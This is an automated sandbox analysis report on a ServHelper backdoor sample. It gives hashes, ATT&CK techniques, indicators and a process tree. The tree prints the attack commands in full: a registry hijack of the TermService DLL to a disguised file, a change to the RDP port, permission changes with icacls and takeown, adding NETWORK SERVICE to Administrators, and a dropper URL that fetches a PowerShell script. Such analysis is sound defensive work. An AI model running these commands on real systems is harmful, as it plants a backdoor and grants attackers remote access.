servhelper | 353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74

Analysis

max time kernel
145s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 10:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exe
Size

6.0MB
MD5

fa8f47009ea5c07fa239e8f98b4a5de1
SHA1

56813df8292edf1d7f4c9c1f9e90b9c722fa238e
SHA256

353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74
SHA512

7df76c27b96774df7a07963d47281d4cd60cb7eaa2d029537f7aa86553c32510bef2166c5bb92a6402e23f497bd5521e124c161866b9bbd1db01991973958551
SSDEEP

49152:DxtmeOhNIWIM/J5mxhIjdvEdnGmol7W3wmAeT7H6O8MO5GfsLPVgyZ7frOMxY6Fj:DzOhN7/D

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
21	2956	powershell.exe
25	2956	powershell.exe
28	2956	powershell.exe
31	2956	powershell.exe
33	2956	powershell.exe
40	2956	powershell.exe
42	2956	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

3940 icacls.exe
3524 icacls.exe
4968 takeown.exe
708 icacls.exe
1696 icacls.exe
3724 icacls.exe
828 icacls.exe
1580 icacls.exe

pid	process
3940	icacls.exe
3524	icacls.exe
4968	takeown.exe
708	icacls.exe
1696	icacls.exe
3724	icacls.exe
828	icacls.exe
1580	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

1792
1792
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

3724 icacls.exe
828 icacls.exe
1580 icacls.exe
3940 icacls.exe
3524 icacls.exe
4968 takeown.exe
708 icacls.exe
1696 icacls.exe

pid	process
1792
1792

pid	process
3724	icacls.exe
828	icacls.exe
1580	icacls.exe
3940	icacls.exe
3524	icacls.exe
4968	takeown.exe
708	icacls.exe
1696	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

20 raw.githubusercontent.com
21 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
20	raw.githubusercontent.com
21	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ogtjb5ak.532.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A21.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5rspfs4b.tir.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A43.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A53.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A32.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A74.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

3288 WMIC.exe

pid	process
3288	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 0deb0d6e8a2fda01	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4036 reg.exe
Runs net.exe

pid	process
4036	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2224	powershell.exe
2224	powershell.exe
2708	powershell.exe
2708	powershell.exe
3572	powershell.exe
3572	powershell.exe
4872	powershell.exe
4872	powershell.exe
2224	powershell.exe
2224	powershell.exe
2224	powershell.exe
2956	powershell.exe
2956	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

660
660

pid	process
660
660

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	4872	powershell.exe
Token: SeRestorePrivilege	1696	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	3288	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3288	WMIC.exe
Token: SeAuditPrivilege	3288	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3288	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3288	WMIC.exe
Token: SeAuditPrivilege	3288	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1500	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1500	WMIC.exe
Token: SeAuditPrivilege	1500	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1500	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1500	WMIC.exe
Token: SeAuditPrivilege	1500	WMIC.exe
Token: SeDebugPrivilege	2956	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 5096 wrote to memory of 2224	5096	353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exe	powershell.exe
PID 5096 wrote to memory of 2224	5096	353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exe	powershell.exe
PID 2224 wrote to memory of 2012	2224	powershell.exe	csc.exe
PID 2224 wrote to memory of 2012	2224	powershell.exe	csc.exe
PID 2012 wrote to memory of 4216	2012	csc.exe	cvtres.exe
PID 2012 wrote to memory of 4216	2012	csc.exe	cvtres.exe
PID 2224 wrote to memory of 2708	2224	powershell.exe	powershell.exe
PID 2224 wrote to memory of 2708	2224	powershell.exe	powershell.exe
PID 2224 wrote to memory of 3572	2224	powershell.exe	powershell.exe
PID 2224 wrote to memory of 3572	2224	powershell.exe	powershell.exe
PID 2224 wrote to memory of 4872	2224	powershell.exe	powershell.exe
PID 2224 wrote to memory of 4872	2224	powershell.exe	powershell.exe
PID 2224 wrote to memory of 4968	2224	powershell.exe	takeown.exe
PID 2224 wrote to memory of 4968	2224	powershell.exe	takeown.exe
PID 2224 wrote to memory of 708	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 708	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 1696	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 1696	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 3724	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 3724	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 828	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 828	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 1580	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 1580	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 3940	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 3940	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 3524	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 3524	2224	powershell.exe	icacls.exe
PID 2224 wrote to memory of 5008	2224	powershell.exe	reg.exe
PID 2224 wrote to memory of 5008	2224	powershell.exe	reg.exe
PID 2224 wrote to memory of 4036	2224	powershell.exe	reg.exe
PID 2224 wrote to memory of 4036	2224	powershell.exe	reg.exe
PID 2224 wrote to memory of 208	2224	powershell.exe	reg.exe
PID 2224 wrote to memory of 208	2224	powershell.exe	reg.exe
PID 2224 wrote to memory of 4864	2224	powershell.exe	net.exe
PID 2224 wrote to memory of 4864	2224	powershell.exe	net.exe
PID 4864 wrote to memory of 2724	4864	net.exe	net1.exe
PID 4864 wrote to memory of 2724	4864	net.exe	net1.exe
PID 2224 wrote to memory of 2172	2224	powershell.exe	cmd.exe
PID 2224 wrote to memory of 2172	2224	powershell.exe	cmd.exe
PID 2172 wrote to memory of 3808	2172	cmd.exe	cmd.exe
PID 2172 wrote to memory of 3808	2172	cmd.exe	cmd.exe
PID 3808 wrote to memory of 3204	3808	cmd.exe	net.exe
PID 3808 wrote to memory of 3204	3808	cmd.exe	net.exe
PID 3204 wrote to memory of 3460	3204	net.exe	net1.exe
PID 3204 wrote to memory of 3460	3204	net.exe	net1.exe
PID 2224 wrote to memory of 1932	2224	powershell.exe	cmd.exe
PID 2224 wrote to memory of 1932	2224	powershell.exe	cmd.exe
PID 1932 wrote to memory of 2028	1932	cmd.exe	cmd.exe
PID 1932 wrote to memory of 2028	1932	cmd.exe	cmd.exe
PID 2028 wrote to memory of 2260	2028	cmd.exe	net.exe
PID 2028 wrote to memory of 2260	2028	cmd.exe	net.exe
PID 2260 wrote to memory of 2944	2260	net.exe	net1.exe
PID 2260 wrote to memory of 2944	2260	net.exe	net1.exe
PID 3428 wrote to memory of 4528	3428	cmd.exe	net.exe
PID 3428 wrote to memory of 4528	3428	cmd.exe	net.exe
PID 4528 wrote to memory of 3104	4528	net.exe	net1.exe
PID 4528 wrote to memory of 3104	4528	net.exe	net1.exe
PID 4956 wrote to memory of 4816	4956	cmd.exe	net.exe
PID 4956 wrote to memory of 4816	4956	cmd.exe	net.exe
PID 4816 wrote to memory of 1256	4816	net.exe	net1.exe
PID 4816 wrote to memory of 1256	4816	net.exe	net1.exe
PID 4476 wrote to memory of 1428	4476	cmd.exe	net.exe
PID 4476 wrote to memory of 1428	4476	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exe
"C:\Users\Admin\AppData\Local\Temp\353a484824356a70e6d08c5cf637228d2788364199c1bb4b3feca28783378f74.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2224
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iiqhpvco\iiqhpvco.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2012
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES53DD.tmp" "c:\Users\Admin\AppData\Local\Temp\iiqhpvco\CSC7CB1CF74119A4EEABEEA38D59A8CC6.TMP"
      4⤵
      PID:4216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4872
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4968
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:708
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1696
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3724
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:828
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1580
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3940
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3524
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:5008
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:4036
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:208
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2724
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2172
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3808
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3204
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
